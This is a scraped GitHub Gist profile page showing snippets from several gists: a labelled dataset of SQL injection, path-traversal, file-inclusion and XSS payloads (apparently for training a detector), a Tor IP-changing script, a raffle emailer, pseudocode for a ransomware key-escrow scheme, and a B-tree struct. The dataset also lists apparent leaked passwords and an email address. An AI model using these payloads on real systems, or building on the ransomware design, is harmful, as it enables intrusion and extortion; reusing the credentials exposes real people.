Skip to content

Instantly share code, notes, and snippets.

View tarcisio-marinho's full-sized avatar
:octocat:
Working

Tarcísio tarcisio-marinho

:octocat:
Working
View GitHub Profile
__label__sql UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
__label__path-traversal ??%%32%%66??%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts
__label__path-traversal 0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
__label__credentials lakhwindersinghkalsi
__label__credentials shannon05
__label__file-inclusion /var/log/news/news.crit
__label__xss <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
__label__credentials e1fst0ne
__label__email hkkvqbzd321@hotmail.com
__label__file-inclusion ..%252fboot.ini;index.html
../../etc/passwd
../../etc/issue
../../boot.ini
../../windows/system32/drivers/etc/hosts
../../../etc/passwd
../../../etc/issue
../../../boot.ini
../../../windows/system32/drivers/etc/hosts
../../../../etc/passwd
../../../../etc/issue
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(1)
a=alert,a(1)
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
'>alert(1)</script><script/1='
dataset/
credentials/all_files.txt
email/all_files.txt
file-inclusion/all_files.txt
path-traversal/all_files.txt
rce/all_files.txt
sql/all_files.txt
xss/all_files.txt
xxe/all_files.txt
@tarcisio-marinho
tarcisio-marinho / change_ip.py
Created January 28, 2019 16:13
change IP address using tor with Python3
# change IP via tor with python
import requests
from stem import Signal
from stem.control import Controller
import socks, socket
import time
# tuts
# https://www.torproject.org/docs/faq.html.en#torrc
# https://stem.torproject.org/tutorials/the_little_relay_that_could.html
@tarcisio-marinho
tarcisio-marinho / sort.py
Last active January 31, 2020 03:44
realizar sorteio
#!/usr/bin/env python
#encoding=UTF-8
# resultado sorteio https://pastebin.com/WzmG3EiX
import smtplib
import random
import sys
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
# client public and private key will be here / generated new key pair for each infection
client_public_key = ""
client_private_key = ""
# hardcoded Spub.key
server_public_key = ""
# encrypt Cpriv.key with Spub.key
encrypted_client_private_key = encrypt_client_private_key(client_private_key, server_public_key)
write_to_disk(encrypted_client_private_key)
# some encrypted keys
encrypted_client_private_key = ""
encrypted_AES_keys = ""
# when the victim pay the ransom
# get Cpriv.key back
client_private_key = request_server_decrypt_client_private_key(encrypted_client_private_key)
# decrypt aes_keys with Cpriv.key
aes_keys = decrypt_aes_keys(encrypted_AES_keys, client_private_key)
typedef struct node {
int n; //how many keys on the node
int chaves[4]; //keys
struct node *sibilims[5]; //pointer to sibilims
} Node;